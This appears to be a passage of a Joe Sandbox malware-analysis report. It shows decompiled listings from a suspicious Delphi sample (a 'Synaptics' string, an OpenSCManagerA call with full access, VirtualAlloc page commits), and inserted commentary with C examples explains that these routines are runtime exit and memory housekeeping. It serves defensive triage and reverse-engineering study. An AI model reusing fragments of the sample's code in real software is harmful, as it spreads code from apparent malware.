                                                    							 *[fs:eax] = _t153;
                                                    							L00403BEC(_v20);
                                                    						}
                                                    					} else {
                                                    						E00404BB8( &_v40, _t118);
                                                    						_t133 =  *0x49e668; // 0x400000
                                                    						_v20 = E0041E0D0(_t133, 1, 0xa, _v40);
                                                    						_push(_t161);
                                                    						_push(0x477bd6);
                                                    						_push( *[fs:eax]);
                                                    						 *[fs:eax] = _t162;
                                                    						E0041DD9C(_v20, _t118, _v24, __edi); // executed
                                                    						_pop(_t157);
                                                    						 *[fs:eax] = _t157;
                                                    						L00403BEC(_v20);
                                                    					}
                                                    					_pop(_t141);
                                                    					_pop(_t123);
                                                    					 *[fs:eax] = _t141;
                                                    					__eflags = 0;
                                                    					_push(_t161);
                                                    					_push(0x477d81);
                                                    					_push( *[fs:eax]);
                                                    					 *[fs:eax] = _t162;
                                                    					E00409A90(_v24, 6);
                                                    					E00472EF0( &_v72, _t118, _t123, __eflags);
                                                    					E00404DCC(_v72, 0x477de8);
                                                    					if(__eflags == 0) {
                                                    						E0047475C( &_v80, _t118, _t158, _t159, __eflags);
                                                    						E00473490(_v12, _t118, _v80, _v24, __eflags, 0, 0);
                                                    					} else {
                                                    						E0047475C( &_v76, _t118, _t158, _t159, __eflags);
                                                    						E00473490(_v12, _t118, _v76, _v24, __eflags, 0, _v13); // executed
                                                    					}
                                                    					_pop(_t145);
                                                    					 *[fs:eax] = _t145;
                                                    				} else {
                                                    					_v14 = 0;
                                                    				}
                                                    				_pop(_t146);
                                                    				 *[fs:eax] = _t146;
                                                    				_push(0x477db5);
                                                    				E004049E4( &_v80, 0xf);
                                                    				return E004049C0( &_v8);
                                                    			}

                                                    APIs
                                                    • FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 00477B20
                                                      • Part of subcall function 00402B68: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,?,00000000,00474795,004747D4,?,00000000,004747BE,?,?,?,?,00000000), ref: 00402B8C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileFindModuleNameResource
                                                    • String ID: ._cache_
                                                    • API String ID: 938654709-4202169512
                                                    • Opcode ID: 1813762d8ab73c72f462dcf35abd4216ef9f666e93594e03b5b88217cc4ef2bb
                                                    • Instruction ID: f4b1b61c27c6b3fcd429a4d8c4df21a5758f96423c611e3672b605c149e07d86
                                                    • Opcode Fuzzy Hash: 1813762d8ab73c72f462dcf35abd4216ef9f666e93594e03b5b88217cc4ef2bb
                                                    • Instruction Fuzzy Hash: 7D61D430A042099FDB11EFA5D852AEEB7B9EF49704F60847BF504B7291D739AD01CB68
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 72%
                                                    			E00478CB0(void* __edx) {
                                                    				intOrPtr _t3;
                                                    				intOrPtr* _t5;
                                                    				intOrPtr* _t6;
                                                    				intOrPtr* _t7;
                                                    				intOrPtr _t14;
                                                    				intOrPtr _t18;
                                                    				intOrPtr _t21;
                                                    
                                                    				_push(_t21);
                                                    				_push(0x478d26);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t21;
                                                    				 *0x49ec80 =  *0x49ec80 + 1;
                                                    				if( *0x49ec80 == 0) {
                                                    					 *0x49ec84 = 1;
                                                    					_t3 =  *0x49ec88; // 0x0
                                                    					L00403BEC(_t3);
                                                    					_t5 =  *0x49dc9c; // 0x49e020
                                                    					 *_t5 = 0;
                                                    					_t6 =  *0x49d7a8; // 0x49e000
                                                    					 *_t6 = 0;
                                                    					_t7 =  *0x49dc20; // 0x49e810
                                                    					 *_t7 = 0;
                                                    					if( *0x49ec90 != 0) {
                                                    						L00417DFC(); // executed
                                                    					}
                                                    					_t18 =  *0x401094; // 0x401098
                                                    					E004054C8(0x49c9e8, 5, _t18);
                                                    				}
                                                    				_pop(_t14);
                                                    				 *[fs:eax] = _t14;
                                                    				_push(0x478d2d);
                                                    				return 0;
                                                    			}

                                                    APIs
                                                    • 742FF460.OLE32(00000000,00478D26), ref: 00478CFE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: F460
                                                    • String ID: I
                                                    • API String ID: 329004136-429267355
                                                    • Opcode ID: 9cca7072fc9e56bcc694ba2f6119dd7fbf3d3764145fe58f9e0d1812247d53b8
                                                    • Instruction ID: 9009332550508c6597b3b9da99e6bfd18627bf9d89c0e286b3a7dbd72528ea00
                                                    • Opcode Fuzzy Hash: 9cca7072fc9e56bcc694ba2f6119dd7fbf3d3764145fe58f9e0d1812247d53b8
                                                    • Instruction Fuzzy Hash: 43F0A4706046408FF315DF2AED156567BE5EBA9304B828477E408976B1DE785802CB1C
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 79%
                                                    			E0040484C() {
                                                    				struct HINSTANCE__* _t24;
                                                    				void* _t32;
                                                    				intOrPtr _t35;
                                                    				void* _t45;
                                                    
                                                    				if( *0x0049E660 != 0 ||  *0x49e048 == 0) {
                                                    					L3:
                                                    					if( *0x49b004 != 0) {
                                                    						E00404734();
                                                    						E004047C0(_t32);
                                                    						 *0x49b004 = 0;
                                                    					}
                                                    					L5:
                                                    					while(1) {
                                                    						if( *((char*)(0x49e660)) == 2 &&  *0x49b000 == 0) {
                                                    							 *0x0049E644 = 0;
                                                    						}
                                                    						E004045C4(); // executed
                                                    						if( *((char*)(0x49e660)) <= 1 ||  *0x49b000 != 0) {
                                                    							_t14 =  *0x0049E648;
                                                    							if( *0x0049E648 != 0) {
                                                    								E0040653C(_t14);
                                                    								_t35 =  *((intOrPtr*)(0x49e648));
                                                    								_t7 = _t35 + 0x10; // 0x400000
                                                    								_t24 =  *_t7;
                                                    								_t8 = _t35 + 4; // 0x400000
                                                    								if(_t24 !=  *_t8 && _t24 != 0) {
                                                    									FreeLibrary(_t24);
                                                    								}
                                                    							}
                                                    						}
                                                    						E0040459C();
                                                    						if( *((char*)(0x49e660)) == 1) {
                                                    							 *0x0049E65C();
                                                    						}
                                                    						if( *((char*)(0x49e660)) != 0) {
                                                    							E00404790();
                                                    						}
                                                    						if( *0x49e638 == 0) {
                                                    							if( *0x49e028 != 0) {
                                                    								 *0x49e028();
                                                    							}
                                                    							ExitProcess( *0x49b000); // executed
                                                    						}
                                                    						memcpy(0x49e638,  *0x49e638, 0xb << 2);
                                                    						_t45 = _t45 + 0xc;
                                                    						0x49b000 = 0x49b000;
                                                    					}
                                                    				} else {
                                                    					do {
                                                    						 *0x49e048 = 0;
                                                    						 *((intOrPtr*)( *0x49e048))();
                                                    					} while ( *0x49e048 != 0);
                                                    					goto L3;
                                                    				}
                                                    			}

                                                    APIs
                                                    • FreeLibrary.KERNEL32(00400000,?,?,?,00000002,0040492E,0040286B,004028B3,Synaptics,00000000,00402794,?,?,?,00000000), ref: 004048D1
                                                    • ExitProcess.KERNEL32(00000000,?,?,?,00000002,0040492E,0040286B,004028B3,Synaptics,00000000,00402794,?,?,?,00000000), ref: 00404906
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExitFreeLibraryProcess
                                                    • String ID:
                                                    • API String ID: 1404682716-0
                                                    • Opcode ID: aace151720c6b04e09c8da3b3daabfaf2305c7a6b183d5e44d56bdc4e9efabf5
                                                    • Instruction ID: 8f7f5b5083db65be3b92a9b52f1338e088dbfa5033c12c2e4b8cbee57b0dbfcd
                                                    • Opcode Fuzzy Hash: aace151720c6b04e09c8da3b3daabfaf2305c7a6b183d5e44d56bdc4e9efabf5
                                                    • Instruction Fuzzy Hash: 88217CFA900285AFEB20AF66848475777D1AF89314F24897B9A04A72C6D77CCCD0C75D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 79%
                                                    			E00404844() {
                                                    				intOrPtr* _t13;
                                                    				struct HINSTANCE__* _t27;
                                                    				void* _t36;
                                                    				intOrPtr _t39;
                                                    				void* _t52;
                                                    
                                                    				 *((intOrPtr*)(_t13 +  *_t13)) =  *((intOrPtr*)(_t13 +  *_t13)) + _t13 +  *_t13;
                                                    				if( *0x0049E660 != 0 ||  *0x49e048 == 0) {
                                                    					L5:
                                                    					if( *0x49b004 != 0) {
                                                    						E00404734();
                                                    						E004047C0(_t36);
                                                    						 *0x49b004 = 0;
                                                    					}
                                                    					L7:
                                                    					if( *((char*)(0x49e660)) == 2 &&  *0x49b000 == 0) {
                                                    						 *0x0049E644 = 0;
                                                    					}
                                                    					E004045C4(); // executed
                                                    					if( *((char*)(0x49e660)) <= 1 ||  *0x49b000 != 0) {
                                                    						_t17 =  *0x0049E648;
                                                    						if( *0x0049E648 != 0) {
                                                    							E0040653C(_t17);
                                                    							_t39 =  *((intOrPtr*)(0x49e648));
                                                    							_t7 = _t39 + 0x10; // 0x400000
                                                    							_t27 =  *_t7;
                                                    							_t8 = _t39 + 4; // 0x400000
                                                    							if(_t27 !=  *_t8 && _t27 != 0) {
                                                    								FreeLibrary(_t27);
                                                    							}
                                                    						}
                                                    					}
                                                    					E0040459C();
                                                    					if( *((char*)(0x49e660)) == 1) {
                                                    						 *0x0049E65C();
                                                    					}
                                                    					if( *((char*)(0x49e660)) != 0) {
                                                    						E00404790();
                                                    					}
                                                    					if( *0x49e638 == 0) {
                                                    						if( *0x49e028 != 0) {
                                                    							 *0x49e028();
                                                    						}
                                                    						ExitProcess( *0x49b000); // executed
                                                    					}
                                                    					memcpy(0x49e638,  *0x49e638, 0xb << 2);
                                                    					_t52 = _t52 + 0xc;
                                                    					0x49b000 = 0x49b000;
                                                    					goto L7;
                                                    				} else {
                                                    					do {
                                                    						 *0x49e048 = 0;
                                                    						 *((intOrPtr*)( *0x49e048))();
                                                    					} while ( *0x49e048 != 0);
                                                    					goto L5;
                                                    				}
                                                    			}

Instruction addresses (side-by-side address column of the decompiled listing above, one entry per decompiled line): 0x00404846 0x00404863 0x0040487b 0x00404882 0x00404884 0x00404889 0x00404890 0x00404890 0x00404895 0x00404899 0x004048a2 0x004048a2 0x004048a5 0x004048ae 0x004048b5 0x004048ba 0x004048bc 0x004048c1 0x004048c4 0x004048c4 0x004048c7 0x004048ca 0x004048d1 0x004048d1 0x004048ca 0x004048ba 0x004048d6 0x004048df 0x004048e1 0x004048e1 0x004048e8 0x004048ea 0x004048ea 0x004048f2 0x004048fb 0x004048fd 0x004048fd 0x00404906 0x00404906 0x00404917 0x00404917 0x00404919 0x00000000 0x0040486a 0x0040486a 0x00404870 0x00404874 0x00404876 0x00000000 0x0040486a

                                                    APIs
                                                    • FreeLibrary.KERNEL32(00400000,?,?,?,00000002,0040492E,0040286B,004028B3,Synaptics,00000000,00402794,?,?,?,00000000), ref: 004048D1
                                                    • ExitProcess.KERNEL32(00000000,?,?,?,00000002,0040492E,0040286B,004028B3,Synaptics,00000000,00402794,?,?,?,00000000), ref: 00404906
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExitFreeLibraryProcess
                                                    • String ID:
                                                    • API String ID: 1404682716-0
                                                    • Opcode ID: 21e905b02f2b03465b5a9f80233f0ae414486a0d2daa4ba7a7ebcfa5846c7405
                                                    • Instruction ID: 883b3613692aa30e866907f4332a392e5c305926fac8e5934d264d12186bf84f
                                                    • Opcode Fuzzy Hash: 21e905b02f2b03465b5a9f80233f0ae414486a0d2daa4ba7a7ebcfa5846c7405
                                                    • Instruction Fuzzy Hash: 4F218CF5900285AFEB21AF6684847563BE1AF95314F1488BBDA04A62C6D37CDCD0CB5D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 79%
                                                    			E00404848() {
                                                    				struct HINSTANCE__* _t26;
                                                    				void* _t35;
                                                    				intOrPtr _t38;
                                                    				void* _t51;
                                                    
                                                    				if( *0x0049E660 != 0 ||  *0x49e048 == 0) {
                                                    					L4:
                                                    					if( *0x49b004 != 0) {
                                                    						E00404734();
                                                    						E004047C0(_t35);
                                                    						 *0x49b004 = 0;
                                                    					}
                                                    					L6:
                                                    					if( *((char*)(0x49e660)) == 2 &&  *0x49b000 == 0) {
                                                    						 *0x0049E644 = 0;
                                                    					}
                                                    					E004045C4(); // executed
                                                    					if( *((char*)(0x49e660)) <= 1 ||  *0x49b000 != 0) {
                                                    						_t16 =  *0x0049E648;
                                                    						if( *0x0049E648 != 0) {
                                                    							E0040653C(_t16);
                                                    							_t38 =  *((intOrPtr*)(0x49e648));
                                                    							_t7 = _t38 + 0x10; // 0x400000
                                                    							_t26 =  *_t7;
                                                    							_t8 = _t38 + 4; // 0x400000
                                                    							if(_t26 !=  *_t8 && _t26 != 0) {
                                                    								FreeLibrary(_t26);
                                                    							}
                                                    						}
                                                    					}
                                                    					E0040459C();
                                                    					if( *((char*)(0x49e660)) == 1) {
                                                    						 *0x0049E65C();
                                                    					}
                                                    					if( *((char*)(0x49e660)) != 0) {
                                                    						E00404790();
                                                    					}
                                                    					if( *0x49e638 == 0) {
                                                    						if( *0x49e028 != 0) {
                                                    							 *0x49e028();
                                                    						}
                                                    						ExitProcess( *0x49b000); // executed
                                                    					}
                                                    					memcpy(0x49e638,  *0x49e638, 0xb << 2);
                                                    					_t51 = _t51 + 0xc;
                                                    					0x49b000 = 0x49b000;
                                                    					goto L6;
                                                    				} else {
                                                    					do {
                                                    						 *0x49e048 = 0;
                                                    						 *((intOrPtr*)( *0x49e048))();
                                                    					} while ( *0x49e048 != 0);
                                                    					goto L4;
                                                    				}
                                                    			}

Instruction addresses (side-by-side address column of the decompiled listing above, one entry per decompiled line): 0x00404863 0x0040487b 0x00404882 0x00404884 0x00404889 0x00404890 0x00404890 0x00404895 0x00404899 0x004048a2 0x004048a2 0x004048a5 0x004048ae 0x004048b5 0x004048ba 0x004048bc 0x004048c1 0x004048c4 0x004048c4 0x004048c7 0x004048ca 0x004048d1 0x004048d1 0x004048ca 0x004048ba 0x004048d6 0x004048df 0x004048e1 0x004048e1 0x004048e8 0x004048ea 0x004048ea 0x004048f2 0x004048fb 0x004048fd 0x004048fd 0x00404906 0x00404906 0x00404917 0x00404917 0x00404919 0x00000000 0x0040486a 0x0040486a 0x00404870 0x00404874 0x00404876 0x00000000 0x0040486a

                                                    APIs
                                                    • FreeLibrary.KERNEL32(00400000,?,?,?,00000002,0040492E,0040286B,004028B3,Synaptics,00000000,00402794,?,?,?,00000000), ref: 004048D1
                                                    • ExitProcess.KERNEL32(00000000,?,?,?,00000002,0040492E,0040286B,004028B3,Synaptics,00000000,00402794,?,?,?,00000000), ref: 00404906
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExitFreeLibraryProcess
                                                    • String ID:
                                                    • API String ID: 1404682716-0
                                                    • Opcode ID: d546d851f69e48fd9f4b53ba4d22cf809c9b4c72d8268e3f297f4199c42bff18
                                                    • Instruction ID: 9fe47824b19111ae0d82b188d774791a2e79eaf21524d9292fd64a79079edc68
                                                    • Opcode Fuzzy Hash: d546d851f69e48fd9f4b53ba4d22cf809c9b4c72d8268e3f297f4199c42bff18
                                                    • Instruction Fuzzy Hash: 87216DF5900285AFEB20AF66C48475677E1AF95314F14887B9A04A62C6D37CDCD0CB5D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%
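
The three listings above (E00404844 twice and E00404848) are decompilations of the same bytes, all reaching FreeLibrary at 0x004048D1 and ExitProcess at 0x00404906, and they have the shape of the Delphi runtime's Halt0 routine rather than sample-specific logic: drain the ExitProc chain kept at *0x49e048, run a series of runtime cleanup calls, FreeLibrary the module handle at *0x49e648+0x10 when it differs from the one at +4, call the hook at *0x49e028 if set, and ExitProcess with the exit code at *0x49b000. The do/while at the bottom reads oddly because the decompiler prints the store to *0x49e048 before the call through it; the runtime loads the pointer into a register, clears ExitProc, then calls, so that each handler can reinstall the ExitProc it displaced and the loop drains the whole chain. The C below is an added example, not code from the report or from the sample, that reproduces that chain with three handlers; exit_proc, install_exit_handler, run_exit_chain, demo_exit_chain and the handler names are ours.

```c
/* Added example (not the report's or the sample's code): the ExitProc chain
 * that the decompiled halt routine drains in its do/while loop. Each handler
 * saves the previous ExitProc when installed and restores it when it runs,
 * so "read pointer, clear ExitProc, call it" unwinds the chain in reverse
 * installation order. All names here are ours. */
#include <stddef.h>
#include <string.h>

typedef void (*exit_proc_t)(void);

/* Stand-in for the global the decompiler shows as *0x49e048. */
static exit_proc_t exit_proc = NULL;

/* Order in which handlers ran, for inspection. */
static char run_log[16];
static size_t run_log_len = 0;

static void log_run(char tag) {
    if (run_log_len + 1 < sizeof run_log) {
        run_log[run_log_len++] = tag;
        run_log[run_log_len] = '\0';
    }
}

/* Each handler reinstalls the ExitProc it displaced, as Delphi units do. */
static exit_proc_t saved_by_a = NULL;
static void handler_a(void) { log_run('A'); exit_proc = saved_by_a; }

static exit_proc_t saved_by_b = NULL;
static void handler_b(void) { log_run('B'); exit_proc = saved_by_b; }

static exit_proc_t saved_by_c = NULL;
static void handler_c(void) { log_run('C'); exit_proc = saved_by_c; }

static void install_exit_handler(exit_proc_t fn, exit_proc_t *save_slot) {
    *save_slot = exit_proc;   /* remember whoever was head before us */
    exit_proc = fn;           /* become the head of the chain */
}

/* The loop as the runtime intends it: read the head, clear the global, call.
 * The handler restores the next link, so the loop runs until the chain is
 * empty. Returns the number of handlers that ran. */
static int run_exit_chain(void) {
    int ran = 0;
    while (exit_proc != NULL) {
        exit_proc_t p = exit_proc;
        exit_proc = NULL;
        p();
        ran++;
    }
    return ran;
}

/* Builds a three-handler chain, drains it and returns the run order. */
const char *demo_exit_chain(void) {
    run_log_len = 0;
    run_log[0] = '\0';
    exit_proc = NULL;
    install_exit_handler(handler_a, &saved_by_a);
    install_exit_handler(handler_b, &saved_by_b);
    install_exit_handler(handler_c, &saved_by_c);
    run_exit_chain();
    return run_log;   /* last installed runs first: "CBA" */
}
```

When reading such a loop in a decompilation, the tell-tale is that the global is cleared before the indirect call yet the loop condition still tests it afterwards: that only makes sense if the callee is expected to write it back, which is exactly the chained-handler convention.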

                                                    C-Code - Quality: 100%
                                                    			E00401748(signed int __eax, void** __ecx, intOrPtr __edx) {
                                                    				signed int _v20;
                                                    				void** _v24;
                                                    				void* _t15;
                                                    				void** _t16;
                                                    				void* _t17;
                                                    				signed int _t27;
                                                    				intOrPtr* _t29;
                                                    				void* _t31;
                                                    				intOrPtr* _t32;
                                                    
                                                    				_v24 = __ecx;
                                                    				 *_t32 = __edx;
                                                    				_t31 = __eax & 0xfffff000;
                                                    				_v20 = __eax +  *_t32 + 0x00000fff & 0xfffff000;
                                                    				 *_v24 = _t31;
                                                    				_t15 = _v20 - _t31;
                                                    				_v24[1] = _t15;
                                                    				_t29 =  *0x49e5ec; // 0x49e5ec
                                                    				while(_t29 != 0x49e5ec) {
                                                    					_t7 = _t29 + 8; // 0x0
                                                    					_t17 =  *_t7;
                                                    					_t8 = _t29 + 0xc; // 0x0
                                                    					_t27 =  *_t8 + _t17;
                                                    					if(_t31 > _t17) {
                                                    						_t17 = _t31;
                                                    					}
                                                    					if(_t27 > _v20) {
                                                    						_t27 = _v20;
                                                    					}
                                                    					if(_t27 > _t17) {
                                                    						_t15 = VirtualAlloc(_t17, _t27 - _t17, 0x1000, 4); // executed
                                                    						if(_t15 == 0) {
                                                    							_t16 = _v24;
                                                    							 *_t16 = 0;
                                                    							return _t16;
                                                    						}
                                                    					}
                                                    					_t29 =  *_t29;
                                                    				}
                                                    				return _t15;
                                                    			}

Instruction addresses (side-by-side address column of the decompiled listing above, one entry per decompiled line): 0x0040174f 0x00401753 0x0040175a 0x0040176f 0x00401777 0x0040177d 0x00401783 0x00401786 0x004017ca 0x0040178e 0x0040178e 0x00401791 0x00401794 0x00401798 0x0040179a 0x0040179a 0x004017a0 0x004017a2 0x004017a2 0x004017a8 0x004017b5 0x004017bc 0x004017be 0x004017c4 0x00000000 0x004017c4 0x004017bc 0x004017c8 0x004017c8 0x004017d9

                                                    APIs
                                                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 004017B5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID: I
                                                    • API String ID: 4275171209-1966777607
                                                    • Opcode ID: a7729a2a40d84c19509578ac64f8ad731e2a19a7efc197d915124daa5f5ca19a
                                                    • Instruction ID: d74b7ebcb609947181d21bffa9b817de474e90391ed7449ce6f0c7caa409c1d9
                                                    • Opcode Fuzzy Hash: a7729a2a40d84c19509578ac64f8ad731e2a19a7efc197d915124daa5f5ca19a
                                                    • Instruction Fuzzy Hash: 16117C76A04705ABC310DF29C880A2BBBE5EBC4764F15C53EE598A73A4E734AC408A49
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%
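
E00401748 above is page-commit logic: with __eax as a base address and __edx as a length, it rounds the request out to 4 KiB boundaries (the & 0xfffff000 masks), stores the aligned start and length through __ecx, walks the circular list headed at 0x49e5ec (node address at +8, size at +0xc), and commits only the part of each node that overlaps the aligned range, using VirtualAlloc with MEM_COMMIT (0x1000) and PAGE_READWRITE (4); on the first failure it zeroes the caller's start and returns. It reads as runtime memory housekeeping rather than sample-specific behaviour, which is worth knowing during triage. The C below is an added example, not the report's or the sample's code, that carries that algorithm in portable form with the VirtualAlloc call replaced by a callback so it can be run and checked off Windows; region, range_out, commit_fn, commit_overlaps, commit_log, record_commit and demo_commit are names we chose, and the addresses in the demo are constructed.

```c
/* Added example (not the report's or the sample's code): the page-commit
 * algorithm decompiled as E00401748, in portable C. VirtualAlloc(MEM_COMMIT,
 * PAGE_READWRITE) is replaced by a callback. All names are ours. */
#include <stddef.h>
#include <stdint.h>

#define PAGE_MASK ((uintptr_t)0xFFF)

/* Node layout mirrors the decompilation: next link first, addr at +8,
 * size at +0xc (the prev link at +4 is not used by this routine). */
typedef struct region {
    struct region *next;
    struct region *prev;
    uintptr_t addr;
    uintptr_t size;
} region;

/* Output pair the caller passes in __ecx: [0] aligned start, [1] length. */
typedef struct { uintptr_t start; uintptr_t len; } range_out;

/* Stand-in for VirtualAlloc(addr, len, MEM_COMMIT, PAGE_READWRITE):
 * nonzero on success, zero on failure. */
typedef int (*commit_fn)(uintptr_t addr, uintptr_t len, void *ctx);

/* Returns 1 if every overlapping piece was committed, 0 if a commit failed
 * (then out->start is zeroed, as the original does). */
int commit_overlaps(uintptr_t base, uintptr_t size, const region *head,
                    range_out *out, commit_fn commit, void *ctx)
{
    uintptr_t start = base & ~PAGE_MASK;                       /* round down */
    uintptr_t end   = (base + size + PAGE_MASK) & ~PAGE_MASK;  /* round up   */
    out->start = start;
    out->len   = end - start;

    /* The list is circular; the sentinel head holds no region itself. */
    for (const region *r = head->next; r != head; r = r->next) {
        uintptr_t lo = r->addr;
        uintptr_t hi = r->addr + r->size;
        if (start > lo) lo = start;   /* max(region start, aligned start) */
        if (hi > end)   hi = end;     /* min(region end, aligned end)     */
        if (hi > lo && !commit(lo, hi - lo, ctx)) {
            out->start = 0;
            return 0;
        }
    }
    return 1;
}

/* Recording callback: logs each (addr, len) request; fail_at = n makes the
 * n-th request fail, simulating a VirtualAlloc error (0 = never fail). */
typedef struct { uintptr_t addr[8]; uintptr_t len[8]; int n; int fail_at; } commit_log;

static int record_commit(uintptr_t addr, uintptr_t len, void *ctx) {
    commit_log *log = (commit_log *)ctx;
    if (log->n < 8) { log->addr[log->n] = addr; log->len[log->n] = len; }
    log->n++;
    return log->n != log->fail_at;
}

/* Demo with two constructed regions and a request straddling a page edge.
 * Fills *log and *out; returns what commit_overlaps returned. */
int demo_commit(commit_log *log, range_out *out, int fail_at) {
    static region head, r1, r2;
    head.next = &r1; r1.next = &r2; r2.next = &head;   /* circular list */
    head.prev = &r2; r1.prev = &head; r2.prev = &r1;
    r1.addr = 0x00400000; r1.size = 0x3000;   /* 0x400000 .. 0x403000 */
    r2.addr = 0x00410000; r2.size = 0x1000;   /* 0x410000 .. 0x411000 */
    log->n = 0;
    log->fail_at = fail_at;
    /* request 0x401800 .. 0x402800 -> aligned 0x401000 .. 0x403000;
     * only r1 overlaps, so one commit of 0x2000 bytes at 0x401000 */
    return commit_overlaps(0x00401800, 0x1000, &head, out, record_commit, log);
}
```

The rounding is what makes this worth recognising: any request touching a page gets the whole page committed, so a committed-but-unexpected RWX or RW region in a dump is not by itself evidence of an injection step when it came from this routine.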

                                                    C-Code - Quality: 53%
                                                    			E004738BC(char __eax, signed int __ebx) {
                                                    				char _v8;
                                                    				intOrPtr* _t11;
                                                    				void* _t14;
                                                    				intOrPtr _t25;
                                                    				intOrPtr _t28;
                                                    
                                                    				_push(__ebx);
                                                    				_v8 = __eax;
                                                    				E00404E70(_v8);
                                                    				_push(_t28);
                                                    				_push(0x473922);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t28;
                                                    				_t11 =  *0x49de34; // 0x49b0ec
                                                    				if( *_t11 == 2) {
                                                    					_t14 = OpenSCManagerA(E00404E80(_v8), 0, 0xf003f); // executed
                                                    					if((__ebx & 0xffffff00 | _t14 != 0x00000000) != 0) {
                                                    						CloseServiceHandle(_t14);
                                                    					}
                                                    				}
                                                    				_pop(_t25);
                                                    				 *[fs:eax] = _t25;
                                                    				_push(0x473929);
                                                    				return E004049C0( &_v8);
                                                    			}

Instruction addresses (side-by-side address column of the decompiled listing above, one entry per decompiled line): 0x004738c0 0x004738c1 0x004738c7 0x004738ce 0x004738cf 0x004738d4 0x004738d7 0x004738da 0x004738e2 0x004738f8 0x00473904 0x00473907 0x00473907 0x00473904 0x0047390e 0x00473911 0x00473914 0x00473921

                                                    APIs
                                                    • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,00000000,00473922), ref: 004738F8
                                                    • CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,000F003F,00000000,00473922), ref: 00473907
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseHandleManagerOpenService
                                                    • String ID:
                                                    • API String ID: 1199824460-0
                                                    • Opcode ID: 2fdb9b70dbb00de11f3476dfc7ba33594891e3983922fd245e65b3b845590b37
                                                    • Instruction ID: 9747779068363641c57f556ad18b80e8a6fd65f6f560b6840aedc400607e3997
                                                    • Opcode Fuzzy Hash: 2fdb9b70dbb00de11f3476dfc7ba33594891e3983922fd245e65b3b845590b37
                                                    • Instruction Fuzzy Hash: A7F0F0F0640308AFD701EB65DD03AAB7BECEB46701BA14477FA04A7292DA789E04E518
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00458384(void* __eax) {
                                                    				struct HICON__* _t5;
                                                    				void* _t7;
                                                    				void* _t8;
                                                    				struct HINSTANCE__* _t11;
                                                    				CHAR** _t12;
                                                    				void* _t13;
                                                    
                                                    				_t13 = __eax;
                                                    				 *((intOrPtr*)(_t13 + 0x60)) = LoadCursorA(0, 0x7f00);
                                                    				_t8 = 0xffffffea;
                                                    				_t12 = 0x49befc;
                                                    				do {
                                                    					if(_t8 < 0xffffffef || _t8 > 0xfffffff4) {
                                                    						if(_t8 != 0xffffffeb) {
                                                    							_t11 = 0;
                                                    						} else {
                                                    							goto L4;
                                                    						}
                                                    					} else {
                                                    						L4:
                                                    						_t11 =  *0x49e668; // 0x400000
                                                    					}
                                                    					_t5 = LoadCursorA(_t11,  *_t12); // executed
                                                    					_t7 = E0045843C(_t13, _t5, _t8);
                                                    					_t8 = _t8 + 1;
                                                    					_t12 =  &(_t12[1]);
                                                    				} while (_t8 != 0xffffffff);
                                                    				return _t7;
			}

Addresses: 0x00458388 0x00458396 0x00458399 0x0045839e 0x004583a3 0x004583a6 0x004583b0 0x004583ba 0x00000000 0x00000000 0x00000000 0x004583b2 0x004583b2 0x004583b2 0x004583b2 0x004583c0 0x004583cb 0x004583d0 0x004583d1 0x004583d4 0x004583dd

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
